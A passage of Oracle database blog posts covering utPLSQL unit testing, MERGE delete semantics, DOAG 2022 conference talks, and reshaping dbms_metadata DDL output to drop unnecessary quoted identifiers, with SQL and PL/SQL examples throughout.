      update emp set sal = 5000 where empno = -2;
      
      -- assert
      open c_actual for select * from deptsal where deptno = -10;
      open c_expected for
         select -10 as deptno,
                'Testing' as dname,
                9700 as sum_sal,
                2 as num_emps,
                4850 as avg_sal
           from dual;
      ut.expect(c_actual).to_equal(c_expected).join_by('DEPTNO');
   end refresh_deptsal_upd_dept_and_emp;

   procedure refresh_deptsal_del_dept is
      c_actual sys_refcursor;
   begin
      -- arrange
      insert into dept (deptno, dname, loc)
      values (-10, 'utPLSQL', 'Winterthur');

      -- act
      delete from dept where deptno = -10;

      -- assert
      open c_actual for select * from deptsal where deptno = -10;
      ut.expect(c_actual).to_have_count(0);
   end refresh_deptsal_del_dept;
end test_etl;
/

First, a department -10 is created with employees -1 and -2. Then the salaries of these two employees are adjusted. The expected results are based entirely on literals. Real identifiers are often positive. The use of negative values makes the tests independent of existing data. utPLSQL automatically sets a savepoint before running a test. At the end of the test a rollback to this savepoint is performed. However, if a commit occurs somewhere, the test data with negative identifiers are quickly found and deleted.
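A cleanup after such an accidental commit could be as simple as this sketch, relying on the negative-identifier convention:

-- remove leftover test data identified by negative keys
delete from emp where empno < 0;
delete from dept where deptno < 0;
commit;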

The next figure shows the successful execution of further tests, which I created here.

successful utPLSQL test run

Automatic Refresh

The table deptsal is updated by calling etl.refresh_deptsal. We can fire this call using database triggers. Listing 5 shows how.

create or replace trigger dept_as_iud
   after insert or update or delete on dept
begin
   etl.refresh_deptsal;
end;
/
create or replace trigger emp_as_iud
   after insert or update or delete on emp
begin
   etl.refresh_deptsal;
end;
/

Now the table deptsal is updated after each DML statement on the tables emp and dept. To test whether the database triggers work, I just need to remove the call to etl.refresh_deptsal in the existing tests. For the test on the existing data, I can fire a refresh with a technical update. And voilà, all tests run through without errors.

Time to commit the changes in the version control system, create a pull request, and perform a review.

Incorporating Review Comments

I showed the code to my colleague Lisa. She said that the solution is more complex than necessary and inefficient. On the one hand, the deptsal table is updated too often, for example before a rollback or when more than one DML statement is used on the underlying tables within a transaction. On the other hand, providing a table is not absolutely necessary. Even though the HR manager specifically mentions “table” in her story, it is legitimate to use a view here instead of a table. Lisa thinks that with the amount of data we have, the performance should be good enough, especially if the query is limited to a few departments. Also, these metrics are not queried that often. A view would significantly reduce our code base and simplify maintenance.

Of course Lisa is right. I can drop the table deptsal, the package etl and the database triggers. A simple view called deptsal, based on the fixed query in listing 3, is sufficient here. But what do I do with my tests? – Nothing! They still describe the requirements, which have not changed, and therefore complete successfully. Unless I made a mistake when defining the view.
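Such a view could look like this; a sketch reusing the query from listing 3:

create or replace view deptsal as
   select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
    group by d.deptno, d.dname;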

Refactoring is much easier with existing tests. Some people would argue that tests are what make safe refactoring possible.

Core Messages And Recommendations

The first steps with utPLSQL are the hardest. Make utPLSQL available in all your development and testing environments. For shared environments, ask your DBA for help. Also install the extension for SQL Developer; it is not a requirement, but it simplifies the work with utPLSQL considerably.

Start with small steps. Use utPLSQL to reproduce bugs or to test new requirements. After a short time you will experience how utPLSQL changes the way you code. You will write smaller units. You will isolate code that is difficult to test. This will make your code easier to test and easier to maintain.

The post Testing With utPLSQL – Made Easy With SQL Developer appeared first on Philipp Salvisberg's Blog.

Deleting Rows With Merge


The merge statement allows you to insert, update and delete rows in the target table in one go. This is great. However, the delete part does not work as expected. Is it a bug? No, it works exactly as documented. Nonetheless, I was not aware of this for years. Let’s take a look at this with an example.

Setup

We create a table t (target) with three rows and a table s (source) with four rows. To log DML events we create some after row triggers on table t.

create table t (
   id integer      not null primary key,
   c1 varchar2(20) not null
);

insert into t values (1, 'original 1');
insert into t values (2, 'original 2');
insert into t values (3, 'original 3');

create table s (
   id integer      not null,
   op varchar2(1)  not null check (op in ('I', 'U', 'D')),
   c1 varchar2(20) not null
);

insert into s values (1, 'U', 'original 1');
insert into s values (2, 'U', 'changed 2');
insert into s values (3, 'D', 'deleted 3');
insert into s values (4, 'I', 'new 4');

create or replace trigger t_ar_i after insert on t for each row
begin
   sys.dbms_output.put_line('inserted id ' || :new.id);
end;
/

create or replace trigger t_ar_u after update on t for each row
begin
   sys.dbms_output.put_line('updated id ' || :old.id);
end;
/

create or replace trigger t_ar_d after delete on t for each row
begin
   sys.dbms_output.put_line('deleted id ' || :old.id);
end;
/

Insert, Update, Delete via Merge

Now, we can run this script:

set serveroutput on size unlimited
merge into t
using s
   on (t.id = s.id)
 when matched then
      update
         set t.c1 = s.c1
      delete
       where op = 'D'
 when not matched then
      insert (t.id, t.c1)
      values (s.id, s.c1);
select * from t;      
rollback;

updated id 1
updated id 2
updated id 3
deleted id 3
inserted id 4

4 rows merged.

        ID C1                  
---------- --------------------
         1 original 1          
         2 changed 2           
         4 new 4               

Rollback complete.

The merge statement applied the insert, update and delete operation in the target table t. The result in table t is what we expect.

However, when I look at the output of the DML triggers I do not like the following things:

  • The row with id 1 was updated, even though the column c1 did not change. This update is unnecessary and should be avoided, right?
  • The row with id 3 was updated and then deleted. Updating a row and then deleting it? The first update does not seem necessary, right?

Update Filter

The merge_update_clause documents an optional where_clause for the update part of a merge statement.

Let’s try that to avoid the unnecessary updates.

set serveroutput on size unlimited
merge into t
using s
   on (t.id = s.id)
 when matched then
      update
         set t.c1 = s.c1
       where op = 'U'
         and t.c1 != s.c1
      delete
       where op = 'D'
 when not matched then
      insert (t.id, t.c1)
      values (s.id, s.c1);
select * from t;      
rollback;

updated id 2
inserted id 4

2 rows merged.

        ID C1                  
---------- --------------------
         1 original 1          
         2 changed 2           
         3 original 3          
         4 new 4               

Rollback complete.

Good, no more unnecessary updates. But now we have a new issue. The row with id 3 is not deleted. It looks like the delete part of the merge statement is ignored.

The Fine Print

I thought this was a bug and opened a service request some days ago. The friendly and patient support engineer directed me to this excerpt of the merge_update_clause in the SQL Language Reference of the Oracle Database 19c:

Specify the DELETE where_clause to clean up data in a table while populating or updating it. The only rows affected by this clause are those rows in the destination table that are updated by the merge operation.

So, clearly not a bug. The second sentence can be visualized as Venn diagram:

Venn diagram of deletes in a merge statement

First Update Then Delete

So we have learned that we must first update a row before we can delete it when we use a merge statement. However, we can still avoid unnecessary updates if the row does not need to be deleted.

Let’s update our script once more:

set serveroutput on size unlimited
merge into t
using s
   on (t.id = s.id)
 when matched then
      update
         set t.c1 = s.c1
       where t.c1 != s.c1
          or op = 'D'
      delete
       where op = 'D'
 when not matched then
      insert (t.id, t.c1)
      values (s.id, s.c1);
select * from t;
rollback;

updated id 2
updated id 3
deleted id 3
inserted id 4

3 rows merged.

        ID C1                  
---------- --------------------
         1 original 1          
         2 changed 2           
         4 new 4               

Rollback complete.

Looks good!

The update of the row with id 1 was suppressed, because the c1 column did not change. The row with id 2 was changed, a new row with id 4 was inserted and the row with id 3 is gone. We just have to live with the prior update of id 3.

Conclusion

I imagine I’m not the only one who would have expected the merge statement to behave differently. Especially after watching How to UPSERT (INSERT or UPDATE) rows with MERGE in Oracle Database by Chris Saxon. He also mentioned “delete” here and here.

Remember:

Delete only processes rows that were updated.
— Chris Saxon

The post Deleting Rows With Merge appeared first on Philipp Salvisberg's Blog.

DOAG2022 Highlights


Nobody knows what kind of restrictions we will experience later this year. That’s why the DOAG Conference + Exhibition 2022 took place in September instead of November. The organizers wanted an in-person event. While you can access some selected content remotely, an in-person event has a lot of advantages, like getting in touch with speakers and attendees. I enjoyed it very much. Many thanks to DOAG and all the people behind the scenes who made this possible.

In this blog post, I summarize some of my personal highlights in chronological order.

Day 1 – Theme Day

The very first day of the conference was a theme day. Themes were

  • PL/SQL & APEX
  • Oracle Forms
  • Automation
  • Ransomware
  • Database Migrations
  • Multitenant Architecture
  • PostgreSQL
  • Autonomous Database for DevOps
  • Softskills

Most of the themes were organized as mini conferences with sessions you could join. Others were more like workshops with lightning talks as introduction. And there was the opportunity to book some 1:1 time slots with developer experts for questions regarding Oracle database, performance, JSON, XML, blockchain, frontend testing, JavaScript, NodeJS, cloud, containers, microservices, mobile UI, PWA, low code, SSO, APEX good practices, APEX API, APEX plugins, REST, spatial and more.

AFAIK all sessions were in German on this day. Participants and speakers without the knowledge of German probably felt a bit lost and took the opportunity to talk over a drink or a meal.

PostgreSQL Features Oracle People Will Like

A highlight of this day was this talk by Hans-Jürgen Schönig. He is Austrian, a Viennese to be exact. I can imagine him as a stand-up comedian. Rarely have I laughed so hard at a technical presentation. He presented some features where PostgreSQL shines and the Oracle database does not look so good. The intention was clear. He wanted to make Oracle database fans jealous. If you have the chance to see Hans-Jürgen live, don’t miss it.

Day 2 and 3 – The Conference

The second day was the start of the real conference. 20 parallel streams with 4 to 6 English talks per time slot. The first session was at 08:00 and the last one at 17:00. A 15-minute break between the 45-minute sessions. There were for sure more attendees than at the theme day, but fewer than in 2019 – the last in-person DOAG conference. And some exhibitors were missing. It hurts to see Robotron at the spot where the Trivadis booth was in previous years. Let’s hope for more exhibitors next year.

These are my highlights of the main conference.

Design Patterns in PL/SQL & SQL

Oren Nakdimon had the bad luck to get the 08:00 slot. However, I was lucky to meet him in the bus to the conference center. He convinced me to attend his session (of course he was already on the short list). He used a data model based on artists, genres, albums and songs for all examples and presented the following patterns:

  • Overlap check – Find rows that (partially or fully) overlap a given range. Example: find all artists that were living between two dates.
  • Extendable LOV – Look up a reference table and add new values if they do not exist. Example: get a genre ID by its name; if it doesn't exist, add it.
  • Multi-value parameters – Pass multiple entities to procedures. Example: add an album with its songs.
  • The guardian trigger – Whenever some DML is done on some table T, another piece of code should be executed. Example: enforce the rule that an album must have at least one song.
  • Conditional uniqueness – Enforce a business rule that requires uniqueness of an attribute (column) within a subset of the entity instances (table rows). Example: enforce the rule that each album may have at most one favourite song.
  • Correlated results – Return correlated data based on various inputs. Example: return albums – and all their songs – based on various inputs.
  • Arc relationship – Implement an arc relationship from a generic entity. Example: implement an arc relationship from images to artists and albums.

For each pattern Oren explained the problem and built the suggested solution step by step. He also considered various corner cases.

Have a look at his website where you find the slides (search for “Design Patterns in PL/SQL and SQL”). I’m sure that some of us have solved one or the other problem in a less elegant way.

Oracle Analytics Server, Make It Right from the Beginning

Gianni Ceresa‘s talk was about installing the Oracle Analytics Server the right way. However, a lot of his talk was independent of the product. Simply put, it was about reading the documentation, automation and testing. “Script as much as you can” was one of Gianni’s messages. There was also an interesting side story about how a cloud provider can mess up provisioning its own product. See this blog post to learn more.

The Future of the Oracle Database

The Oracle Database version 23c is the next long-term release. The release is expected in April 2023. The beta program starts in October and ends in February 2023. In this session, Gerald Venzl revealed some new features. He presented the following features with some examples:

  • Schema Level Privileges
  • SQL Domains
  • 4096 Columns
  • JSON Schema
  • Boolean Data Type
  • UPDATE via JOIN
  • JavaScript Stored Procedures
  • IF [NOT] EXISTS
  • GROUP BY Alias / Column Position
  • Table Value Constructor
  • Better RETURNING CLAUSE
  • Developer Role
  • SELECT without FROM
  • Annotations
  • Much Better Error Messages

See this Twitter thread for some pictures per feature. More details will probably be available after CloudWorld. I’m really looking forward to getting access to this release.
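To give an impression, here are speculative sketches of three of the announced features; the final 23c syntax may differ:

-- create a table only if it does not exist yet, with a boolean column
create table if not exists demo (id number, flag boolean);

-- select without from
select sysdate;

-- group by alias
select deptno as department, count(*)
  from emp
 group by department;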

TAPI vs. XAPI

Using a simple example, Jürgen Sieben explained the problems of accessing tables directly and of applying business logic in row-level triggers. He improved the situation by using a table API. The main disadvantage of a table API is that it exposes implementation details such as the structure and the column names. A solution is to use a view layer for read-only access and a transaction API for write access. The table API can still be used, but only internally by the transaction API itself. Finally, Jürgen explained that a CRUD-based API is a technical interface that obscures the intention. To cancel an order you could delete the order with its positions. But most probably you would want to store the reason for the cancellation and change the state of the order. So, a transactional API should be designed from a business perspective.
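To make the distinction concrete, here is a hedged sketch of such a business-oriented operation; the orders table and all names are made up, not Jürgen’s example:

create or replace package order_txn_api is
   procedure cancel_order(
      in_order_id in integer,
      in_reason   in varchar2
   );
end order_txn_api;
/

create or replace package body order_txn_api is
   procedure cancel_order(
      in_order_id in integer,
      in_reason   in varchar2
   ) is
   begin
      -- record the business event instead of just deleting rows
      update orders
         set status        = 'CANCELLED',
             cancel_reason = in_reason
       where order_id = in_order_id;
   end cancel_order;
end order_txn_api;
/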

I liked this talk very much. Not only because I totally agree with Jürgen, but also because I like the way he explains things: concise and easy to follow.

Summary

I enjoyed this conference very much. Thanks to everyone who helped make this conference happen. I’m already looking forward to DOAG2023.

The post DOAG2022 Highlights appeared first on Philipp Salvisberg's Blog.

Quoted Identifiers #JoelKallmanDay


Background and TL;DR

Connor McDonald wrote a blog post named Cleaner DDL than DBMS_METADATA. Back then he asked me if it would be possible to let the formatter remove unnecessary double quotes from quoted identifiers. Yes, of course. Actually, the current version of the PL/SQL & SQL Formatter Settings does exactly that. And no, you cannot do that with dbms_metadata in the Oracle Database versions 19c and 21c. Read on if you are interested in the details.

The Problem with DBMS_METADATA …

When you execute a DDL against the Oracle Database, the database stores some metadata in the data dictionary. The DDL statement itself is not stored, at least not completely. This is one reason why it is a good idea to store DDL statements in files and manage these files within a version control system. Nevertheless, the Oracle Database provides an API – dbms_metadata – to reconstruct a DDL based on the information available in the data dictionary.

Let’s create a view based on the famous dept and emp tables:

create or replace view deptsal as
   select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
    group by d.deptno, d.dname;

and retrieve the DDL like this:

select dbms_metadata.get_ddl('VIEW', 'DEPTSAL', user) from dual;

to produce this DDL:

CREATE OR REPLACE FORCE EDITIONABLE VIEW "REDSTACK"."DEPTSAL" ("DEPTNO", "DNAME", "SUM_SAL", "NUM_EMPS", "AVG_SAL") DEFAULT COLLATION "USING_NLS_COMP"  AS 
  select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
    group by d.deptno, d.dname

We see that the subquery part of the view has been preserved, except the first line which has a different indentation. Actually, the indentation of the first line is not stored in the data dictionary (see user_views.text). The two spaces are produced by the default pretty option of dbms_metadata. So far, so good.

In many cases, the Oracle Data Dictionary explicitly stores default values. For instance, Y for editionable or USING_NLS_COMP for default_collation. This fact alone makes it impossible to reconstruct the original DDL in a reliable way. The database simply does not know whether an optional clause such as editionable or default collation has been specified or omitted. Moreover, some optional DDL clauses such as or replace or force are simply not represented in the data dictionary.
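You can see these explicitly stored values in the dictionary; here is a quick check as a sketch, run as the view owner:

select o.editionable, v.default_collation
  from user_objects o
  join user_views v
    on v.view_name = o.object_name
 where o.object_name = 'DEPTSAL'
   and o.object_type = 'VIEW';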

… Especially with Quoted Identifiers

And last but not least, identifiers such as column names, table names or view names are stored without double quotes. Therefore, the database knows nothing about the use of double quotes in the original DDL. However, the database knows exactly when double quotes are required. As a result, dbms_metadata could emit only necessary double quotes. This would result in a more readable DDL and would probably also be more similar to the original DDL.
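The rule itself is simple: an identifier needs no quotes if it consists of an uppercase letter followed by uppercase letters, digits, _, $ or # and is not a reserved word. A sketch that checks the pattern (ignoring reserved words; see v$reserved_words for those):

select name,
       case
          when regexp_like(name, '^[A-Z][A-Z0-9_$#]*$') then
             'quotes not needed'
          else
             'quotes required'
       end as verdict
  from (select 'DEPTSAL' as name from dual
        union all
        select 'DeptSal' from dual
        union all
        select 'DEPT SAL' from dual);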

The reality is that code generators such as dbms_metadata often use double quotes for all identifiers. It’s simply easier for them, because this way the generated code works for all kinds of strange identifiers.

However, using quoted identifiers is a bad practice. It is, in fact, a very bad practice when they are used unnecessarily.

Shaping the DDL

So what can we do? We can configure dbms_metadata to produce a DDL which is more similar to our original one. In this case we can change the following:

  • remove the schema of the view (owner)
  • remove the force keyword
  • remove the default collation clause
  • add the missing SQL terminator (;)

This query

with
   function view_ddl(in_name in varchar2) return clob is
      l_main_handle   integer;
      l_modify_handle integer;
      l_ddl_handle    integer;
      l_ddl           clob;
   begin
      -- initialize dbms_metadata for view based on current schema
      l_main_handle   := sys.dbms_metadata.open('VIEW');
      sys.dbms_metadata.set_filter(l_main_handle, 'SCHEMA', user);
      sys.dbms_metadata.set_filter(l_main_handle, 'NAME', in_name);
      -- remove schema name from input structure
      l_modify_handle := sys.dbms_metadata.add_transform(l_main_handle, 'MODIFY');
      sys.dbms_metadata.set_remap_param(l_modify_handle, 'REMAP_SCHEMA', user, null);
      -- non-default transformations to improve DDL
      l_ddl_handle    := sys.dbms_metadata.add_transform(l_main_handle, 'DDL');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'FORCE', false);
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'COLLATION_CLAUSE', 'NO_NLS');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'SQLTERMINATOR', true);
      -- get DDL
      l_ddl           := sys.dbms_metadata.fetch_clob(l_main_handle);
      -- free sys.dbms_metadata resources
      sys.dbms_metadata.close(l_main_handle);
      -- return result
      return l_ddl;
   end view_ddl;
select view_ddl('DEPTSAL')
  from dual
/

produces this result:

CREATE OR REPLACE EDITIONABLE VIEW "DEPTSAL" ("DEPTNO", "DNAME", "SUM_SAL", "NUM_EMPS", "AVG_SAL") AS 
  select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
   group by d.deptno, d.dname;

This looks better. However, I would like to configure dbms_metadata to omit the default editionable clause. Furthermore, I do not like the column alias list, which is unnecessary in this case. And of course I’d like to suppress unnecessary double quotes around identifiers. Is that possible with dbms_metadata?

Shaping the DDL from (S)XML

Well, we can try. The dbms_metadata API is very extensive. Besides other things, it can also represent metadata as an XML document. There are two formats.

  • XML – An extensive XML containing internals such as object number, owner number, creation date, etc.
  • SXML – A simple and terse XML that contains everything you need to produce a DDL. The SXML format is therefore very well suited for schema comparison.

It’s possible to produce a DDL from both formats. We can also change the XML beforehand.
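For example, fetching the SXML representation of our view should be a one-liner (a sketch using the documented dbms_metadata.get_sxml function):

select sys.dbms_metadata.get_sxml('VIEW', 'DEPTSAL', user) from dual;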

Let’s look at both variants in the next two subchapters.

Important: I consider the changes to the XML document and configuration of dbms_metadata in the following subchapters as experimental. The purpose is to show what is doable. They are not good examples of how it should be done. Even though the unnecessary list of column aliases annoys me, I would leave them as they are. I also think that overriding the default VERSION is a very bad idea in the long run.

Convert XML to DDL

with
   function view_ddl(in_name in varchar2) return clob is
      l_xml         xmltype;
      l_main_handle integer;
      l_ddl_handle  integer;
      l_ddl         clob;
   begin
      -- create XML document and remove unwanted nodes
      l_xml         := xmltype(sys.dbms_metadata.get_xml('VIEW', in_name, user));
      l_xml         := l_xml.deletexml('/ROWSET/ROW/VIEW_T/SCHEMA_OBJ/OWNER_NAME');
      l_xml         := l_xml.deletexml('/ROWSET/ROW/VIEW_T/COL_LIST');
      -- initialize dbms_metadata for view based on XML input
      l_main_handle := sys.dbms_metadata.openw('VIEW');
      -- non-default transformations to improve DDL
      l_ddl_handle  := sys.dbms_metadata.add_transform(l_main_handle, 'DDL');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'FORCE', false);
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'COLLATION_CLAUSE', 'NO_NLS');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'SQLTERMINATOR', true);
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'VERSION', 1120000000);
      -- get DDL
      sys.dbms_lob.createtemporary(l_ddl, false, sys.dbms_lob.session);
      sys.dbms_metadata.convert(l_main_handle, l_xml, l_ddl);
      -- free dbms_metadata resources
      sys.dbms_metadata.close(l_main_handle);
      -- return result
      return l_ddl;
   end view_ddl;
select xmlserialize(document xmltype(sys.dbms_metadata.get_xml('VIEW', 'DEPTSAL', user))
          as clob indent size = 4)
  from dual
union all
select view_ddl('DEPTSAL')
  from dual
/

The query produces the following two rows (CLOBs):

<?xml version="1.0"?>
<ROWSET>
    <ROW>
        <VIEW_T>
            <VERS_MAJOR>1</VERS_MAJOR>
            <VERS_MINOR>4 </VERS_MINOR>
            <OBJ_NUM>232322</OBJ_NUM>
            <SCHEMA_OBJ>
                <OBJ_NUM>232322</OBJ_NUM>
                <OWNER_NUM>501</OWNER_NUM>
                <OWNER_NAME>REDSTACK</OWNER_NAME>
                <NAME>DEPTSAL</NAME>
                <NAMESPACE>1</NAMESPACE>
                <TYPE_NUM>4</TYPE_NUM>
                <TYPE_NAME>VIEW</TYPE_NAME>
                <CTIME>2022-10-04 12:11:25</CTIME>
                <MTIME>2022-10-04 12:11:25</MTIME>
                <STIME>2022-10-04 12:11:25</STIME>
                <STATUS>1</STATUS>
                <FLAGS>0</FLAGS>
                <FLAGS2>0</FLAGS2>
                <SPARE1>6</SPARE1>
                <SPARE2>65535</SPARE2>
                <SPARE3>501</SPARE3>
                <OWNER_NAME2>REDSTACK</OWNER_NAME2>
                <SIGNATURE>76DCDE35671FAA6AF576D6A6B4D97D48</SIGNATURE>
                <SPARE7>134233583</SPARE7>
                <SPARE8>0</SPARE8>
                <SPARE9>0</SPARE9>
                <DFLCOLLNAME>USING_NLS_COMP</DFLCOLLNAME>
            </SCHEMA_OBJ>
            <AUDIT_VAL>--------------------------------------</AUDIT_VAL>
            <COLS>5</COLS>
            <INTCOLS>5</INTCOLS>
            <PROPERTY>0</PROPERTY>
            <PROPERTY2>0</PROPERTY2>
            <FLAGS>0</FLAGS>
            <TEXTLENGTH>270</TEXTLENGTH>
            <TEXT>select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
   group by d.deptno, d.dname</TEXT>
            <COL_LIST>
                <COL_LIST_ITEM>
                    <OBJ_NUM>232322</OBJ_NUM>
                    <COL_NUM>1</COL_NUM>
                    <INTCOL_NUM>1</INTCOL_NUM>
                    <SEGCOL_NUM>1</SEGCOL_NUM>
                    <PROPERTY>0</PROPERTY>
                    <PROPERTY2>0</PROPERTY2>
                    <NAME>DEPTNO</NAME>
                    <TYPE_NUM>2</TYPE_NUM>
                </COL_LIST_ITEM>
                <COL_LIST_ITEM>
                    <OBJ_NUM>232322</OBJ_NUM>
                    <COL_NUM>2</COL_NUM>
                    <INTCOL_NUM>2</INTCOL_NUM>
                    <SEGCOL_NUM>2</SEGCOL_NUM>
                    <PROPERTY>0</PROPERTY>
                    <PROPERTY2>0</PROPERTY2>
                    <NAME>DNAME</NAME>
                    <TYPE_NUM>1</TYPE_NUM>
                </COL_LIST_ITEM>
                <COL_LIST_ITEM>
                    <OBJ_NUM>232322</OBJ_NUM>
                    <COL_NUM>3</COL_NUM>
                    <INTCOL_NUM>3</INTCOL_NUM>
                    <SEGCOL_NUM>3</SEGCOL_NUM>
                    <PROPERTY>14336</PROPERTY>
                    <PROPERTY2>0</PROPERTY2>
                    <NAME>SUM_SAL</NAME>
                    <TYPE_NUM>2</TYPE_NUM>
                </COL_LIST_ITEM>
                <COL_LIST_ITEM>
                    <OBJ_NUM>232322</OBJ_NUM>
                    <COL_NUM>4</COL_NUM>
                    <INTCOL_NUM>4</INTCOL_NUM>
                    <SEGCOL_NUM>4</SEGCOL_NUM>
                    <PROPERTY>14336</PROPERTY>
                    <PROPERTY2>0</PROPERTY2>
                    <NAME>NUM_EMPS</NAME>
                    <TYPE_NUM>2</TYPE_NUM>
                </COL_LIST_ITEM>
                <COL_LIST_ITEM>
                    <OBJ_NUM>232322</OBJ_NUM>
                    <COL_NUM>5</COL_NUM>
                    <INTCOL_NUM>5</INTCOL_NUM>
                    <SEGCOL_NUM>5</SEGCOL_NUM>
                    <PROPERTY>14336</PROPERTY>
                    <PROPERTY2>0</PROPERTY2>
                    <NAME>AVG_SAL</NAME>
                    <TYPE_NUM>2</TYPE_NUM>
                </COL_LIST_ITEM>
            </COL_LIST>
            <COL_LIST2/>
            <CON1_LIST/>
            <CON2_LIST/>
        </VIEW_T>
    </ROW>
</ROWSET>

CREATE OR REPLACE VIEW "DEPTSAL" () AS 
  select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
    group by d.deptno, d.dname;

We removed the OWNER_NAME node (on line 11) from the XML document. As a result, the schema was removed in the DDL. The result is the same as with the REMAP_SCHEMA transformation. Perfect.

We also removed the COL_LIST node (lines 48-99) from the XML document. However, the result in the DDL regarding the column alias list does not look good. The columns are gone, but the surrounding parentheses survived, which makes the DDL invalid. IMO this is a bug of the $ORACLE_HOME/rdbms/xml/xsl/kuview.xsl script. It’s handled correctly in the SXML script as we will see later. However, we can fix that by calling replace(..., '" () AS', '" AS'). Please note that a complete solution should do some checks to ensure that the COL_LIST is really not required.
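
For illustration, the fix could be applied in the view_ddl function above, right after fetching the DDL. This is a minimal sketch, not a complete solution:

-- sketch: drop the empty column alias list left behind by kuview.xsl;
-- a complete solution should first verify that COL_LIST is really obsolete
l_ddl := replace(l_ddl, '" () AS', '" AS');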

When you look at line 12 in the XML document (<NAME>DEPTSAL</NAME>), you see that the view name does not contain double quotes. This is a strong indicator that there is no way to remove the double quotes by manipulating the input XML document. In fact, the double quotes are hard-coded in all XSLT scripts. There is no way to override this behavior via dbms_metadata.

Furthermore, you do not find a node named EDITIONABLE with a value of Y as in all_objects. Why? Because this information is stored in the FLAGS node. 0 means editionable and 1048576 means noneditionable. To be precise, 1048576 represents bit number 21. If this bit is set, then the view is noneditionable. You find the proof for this statement in the dba_objects view, where the expression for the editionable column looks like this:

case
   when o.type# in (
      4, 5, 7, 8, 9, 11, 12, 13, 14, 22, 87, 114
   )
   then
      decode(
         bitand(o.flags, 1048576),
            0,       'Y', 
            1048576, 'N', 
                     'Y'
      )
   else
      null
end

The $ORACLE_HOME/rdbms/xml/xsl/kucommon.xsl script (see template Editionable) evaluates this flag and emits either an EDITIONABLE or a NONEDITIONABLE keyword. These keywords were introduced in version 12.1. Since dbms_metadata can produce version-specific DDL, we set the version to 11.2 to suppress EDITIONABLE in the resulting DDL.

Convert SXML to DDL

with
   function view_ddl(in_name in varchar2) return clob is
      l_sxml        xmltype;
      l_main_handle integer;
      l_ddl_handle  integer;
      l_ddl         clob;
   begin
      -- create SXML document and remove unwanted nodes
      l_sxml        := xmltype(sys.dbms_metadata.get_sxml('VIEW', in_name, user));
      l_sxml        := l_sxml.deletexml('/VIEW/SCHEMA', 'xmlns="http://xmlns.oracle.com/ku"');
      l_sxml        := l_sxml.deletexml('/VIEW/COL_LIST', 'xmlns="http://xmlns.oracle.com/ku"');
      -- initialize dbms_metadata for view based on SXML input
      l_main_handle := sys.dbms_metadata.openw('VIEW');
      -- non-default transformations to improve DDL
      l_ddl_handle  := sys.dbms_metadata.add_transform(l_main_handle, 'SXMLDDL');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'FORCE', false);
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'COLLATION_CLAUSE', 'NO_NLS');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'SQLTERMINATOR', true);
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'VERSION', 1120000000);
      -- get DDL
      sys.dbms_lob.createtemporary(l_ddl, false, sys.dbms_lob.session);
      sys.dbms_metadata.convert(l_main_handle, l_sxml, l_ddl);
      -- free dbms_metadata resources
      sys.dbms_metadata.close(l_main_handle);
      -- return result
      return l_ddl;
   end view_ddl;
select xmlserialize(document xmltype(sys.dbms_metadata.get_sxml('VIEW', 'DEPTSAL', user))
          as clob indent size = 4)
  from dual
union all
select view_ddl('DEPTSAL')
  from dual
/

The query produces the following two rows (CLOBs):

<VIEW xmlns="http://xmlns.oracle.com/ku" version="1.0">
    <SCHEMA>REDSTACK</SCHEMA>
    <NAME>DEPTSAL</NAME>
    <DEFAULT_COLLATION>USING_NLS_COMP</DEFAULT_COLLATION>
    <COL_LIST>
        <COL_LIST_ITEM>
            <NAME>DEPTNO</NAME>
        </COL_LIST_ITEM>
        <COL_LIST_ITEM>
            <NAME>DNAME</NAME>
        </COL_LIST_ITEM>
        <COL_LIST_ITEM>
            <NAME>SUM_SAL</NAME>
        </COL_LIST_ITEM>
        <COL_LIST_ITEM>
            <NAME>NUM_EMPS</NAME>
        </COL_LIST_ITEM>
        <COL_LIST_ITEM>
            <NAME>AVG_SAL</NAME>
        </COL_LIST_ITEM>
    </COL_LIST>
    <SUBQUERY>select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
   group by d.deptno, d.dname</SUBQUERY>
</VIEW>

CREATE OR REPLACE VIEW ""."DEPTSAL" 
  AS 
  select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
    group by d.deptno, d.dname;

The SXML document is smaller. It contains just the nodes to produce a DDL. That makes it easier to read.

